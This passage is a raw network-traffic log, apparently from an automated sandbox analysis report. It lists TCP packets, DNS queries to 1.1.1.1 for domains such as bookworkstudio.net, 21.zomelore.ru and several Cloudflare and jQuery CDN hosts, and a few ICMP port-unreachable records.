                                                                                                                                                                                                          Dec 12, 2024 00:30:08.227659941 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.228410006 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.228472948 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.229973078 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.230051994 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.230803967 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.230887890 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.231651068 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.231717110 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.232649088 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.232706070 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.233433008 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.233483076 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.234253883 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.234332085 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.235101938 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.235173941 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.235887051 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.235944033 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.235974073 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236006021 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236054897 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236145020 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236181974 CET4435001620.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236206055 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:08.236233950 CET50016443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.124872923 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.167325974 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.857701063 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.857714891 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.857810020 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.857971907 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.857973099 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.858047962 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.865299940 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.865386963 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.905081987 CET50000443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:20.905155897 CET4435000020.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.104681015 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.104773998 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.104882956 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.105067968 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:21.105087996 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.204437017 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.204703093 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.204740047 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.205873966 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.206146002 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.206281900 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.206295013 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.206321001 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.256503105 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.904757023 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.904814005 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.905050039 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.905114889 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.905219078 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.921839952 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.921930075 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.933105946 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.933335066 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.950054884 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.950233936 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959255934 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959425926 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959444046 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959491014 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959525108 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.959625006 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.960156918 CET50079443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.960186958 CET4435007920.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.964828014 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.964876890 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.964946985 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.965145111 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:23.965159893 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.050738096 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.051104069 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.051141024 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.051480055 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.051893950 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.051964998 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.052258015 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.095326900 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.747215986 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.747268915 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.747423887 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.747459888 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.747770071 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.763618946 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.763710022 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.772295952 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.772387981 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.789248943 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.789529085 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797600031 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797681093 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797683001 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797833920 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797868967 CET4435009320.38.136.70192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797903061 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797903061 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:26.797950983 CET50093443192.168.2.420.38.136.70
                                                                                                                                                                                                          Dec 12, 2024 00:30:45.898463011 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:45.898525000 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:45.898602009 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:45.898818970 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:45.898849964 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.608907938 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.609209061 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.609272003 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.609880924 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.610168934 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.610227108 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:47.663006067 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:57.313649893 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:57.313836098 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:57.313901901 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:57.414187908 CET50144443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:30:57.414211988 CET44350144142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:45.960727930 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:31:45.960789919 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:45.960875034 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:31:45.961050034 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:31:45.961072922 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.671830893 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.672099113 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.672131062 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.673221111 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.673485994 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.673660994 CET44350273142.250.181.100192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:47.724735022 CET50273443192.168.2.4142.250.181.100
                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.291138887 CET6111353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.291265965 CET5255453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.339615107 CET53555631.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.428694963 CET53527151.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.731430054 CET53525541.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.731462955 CET53611131.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.460414886 CET6133253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.460692883 CET6194153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.463161945 CET6275753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.463306904 CET5953553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.601829052 CET53627571.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.601845026 CET53619411.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.603842974 CET53595351.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.168004036 CET53610631.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.471771955 CET5363753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.608649969 CET53536371.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.772975922 CET6504053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.773147106 CET5197453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.909849882 CET53519741.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.915079117 CET53650401.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.587984085 CET5132553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.588176966 CET5248253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.662769079 CET6371253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.663278103 CET5940453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.725080967 CET53513251.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.725097895 CET53524821.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.106504917 CET53637121.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:47.133666039 CET53594041.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578444004 CET5602553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578566074 CET5779753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578953028 CET5859753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579077959 CET6135453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579365015 CET5439653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579469919 CET5404353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.714957952 CET53577971.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715435982 CET53585971.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.715521097 CET53560251.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716005087 CET53613541.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716017962 CET53543961.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.716370106 CET53540431.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.832314968 CET5496053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.832438946 CET6123253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971762896 CET53612321.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.971786976 CET53549601.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:53.680740118 CET53547551.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.360682964 CET5844753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.360913038 CET6196453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.425949097 CET6177053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.426141024 CET6338353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.497577906 CET53619641.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.497803926 CET53584471.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.563009977 CET53617701.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.564400911 CET53633831.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257164001 CET5280753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257302999 CET6093453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.396296024 CET53528071.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.398242950 CET53609341.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:01.113238096 CET53549261.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:02.576179028 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124707937 CET5551353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.124819040 CET6401153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.600188971 CET53555131.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:13.600235939 CET53640111.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.955416918 CET6138653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:16.955564022 CET5928353192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093070030 CET53592831.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:17.093115091 CET53613861.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:20.038592100 CET53578461.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:41.098335028 CET53648721.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:42.473400116 CET53633751.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.676898956 CET6371553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:43.676898956 CET5623853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.935278893 CET6329753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:45.935636044 CET5016753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:46.329040051 CET53501671.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:48.884329081 CET6250853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:48.884459019 CET5402453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:49.023866892 CET53540241.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:50.134557009 CET5830053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:50.134754896 CET5421453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.158050060 CET5121953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.158174992 CET5148453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.696719885 CET6288153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:52.696849108 CET6039753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.222455025 CET5947453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.222620964 CET5992053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.236953974 CET5373153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:54.237185001 CET5810153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.114803076 CET6122253192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:57.114918947 CET5706653192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.559132099 CET6353453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:03.559468985 CET5709753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:10.453299046 CET53595131.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:12.536570072 CET53614331.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.087944984 CET5176953192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.088114977 CET5243853192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.139406919 CET5283053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:15.139595032 CET5583053192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:19.963387966 CET5064153192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:19.963509083 CET5434453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:30:59.732284069 CET53513901.1.1.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.211584091 CET5966753192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:31:22.211860895 CET5639453192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.817059040 CET5310553192.168.2.41.1.1.1
                                                                                                                                                                                                          Dec 12, 2024 00:31:24.817230940 CET5451953192.168.2.41.1.1.1
                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.550261021 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                                                                                                          Dec 12, 2024 00:29:51.297020912 CET192.168.2.41.1.1.1c302(Port unreachable)Destination Unreachable
                                                                                                                                                                                                          Dec 12, 2024 00:30:18.460551023 CET192.168.2.41.1.1.1c2dc(Port unreachable)Destination Unreachable
                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.291138887 CET192.168.2.41.1.1.10x4d35Standard query (0)bookworkstudio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:41.291265965 CET192.168.2.41.1.1.10x937dStandard query (0)bookworkstudio.net65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.460414886 CET192.168.2.41.1.1.10xcdd4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.460692883 CET192.168.2.41.1.1.10x6376Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.463161945 CET192.168.2.41.1.1.10x6023Standard query (0)bookworkstudio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:43.463306904 CET192.168.2.41.1.1.10x4252Standard query (0)bookworkstudio.net65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:44.471771955 CET192.168.2.41.1.1.10x584dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.772975922 CET192.168.2.41.1.1.10x12dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:45.773147106 CET192.168.2.41.1.1.10xa893Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.587984085 CET192.168.2.41.1.1.10x297cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.588176966 CET192.168.2.41.1.1.10xc23fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.662769079 CET192.168.2.41.1.1.10x55ccStandard query (0)21.zomelore.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:46.663278103 CET192.168.2.41.1.1.10xf197Standard query (0)21.zomelore.ru65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578444004 CET192.168.2.41.1.1.10xec52Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578566074 CET192.168.2.41.1.1.10x1e14Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.578953028 CET192.168.2.41.1.1.10xcff8Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579077959 CET192.168.2.41.1.1.10xc940Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579365015 CET192.168.2.41.1.1.10xe5e5Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:50.579469919 CET192.168.2.41.1.1.10x7fa0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.832314968 CET192.168.2.41.1.1.10xf8dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:52.832438946 CET192.168.2.41.1.1.10xdceaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.360682964 CET192.168.2.41.1.1.10x83b0Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.360913038 CET192.168.2.41.1.1.10xa969Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.425949097 CET192.168.2.41.1.1.10x76f5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:54.426141024 CET192.168.2.41.1.1.10x1770Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257164001 CET192.168.2.41.1.1.10xed72Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257302999 CET192.168.2.41.1.1.10x8869Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
